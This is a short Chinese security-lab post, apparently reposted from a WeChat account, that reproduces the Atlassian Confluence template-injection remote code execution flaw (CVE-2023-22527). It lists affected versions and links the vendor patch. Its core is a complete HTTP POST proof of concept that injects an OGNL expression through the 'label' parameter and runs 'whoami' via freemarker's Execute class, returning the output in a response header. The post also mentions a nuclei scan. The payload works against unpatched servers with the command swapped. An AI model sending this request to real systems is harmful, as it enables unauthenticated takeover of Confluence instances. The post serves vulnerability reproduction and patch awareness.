网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。
Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。
Confluence Data Center and Server 8.0.x
Confluence Data Center and Server 8.1.x
Confluence Data Center and Server 8.2.x
Confluence Data Center and Server 8.3.x
Confluence Data Center and Server 8.4.x
8.5.0 <= Confluence Data Center and Server <= 8.5.3
1.访问漏洞环境
2.对漏洞进行复现
POC (POST)
漏洞复现
POST /template/aui/text-inline.vm HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 286
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
label=aaau0027%2b#request.get(u0027.KEY_velocity.struts2.contextu0027).internalGet(u0027ognlu0027).findValue(#parameters.poc[0],{})%2bu0027&poc= .apache.struts2.ServletActionContext ().setHeader('Cmd-Ret',(new+freemarker.template.utility.Execute()).exec({"whoami"}))
测试whoami(漏洞存在)
3.nuclei工具测试(漏洞存在)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615
原文始发于微信公众号(弥天安全实验室):【成功复现】Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论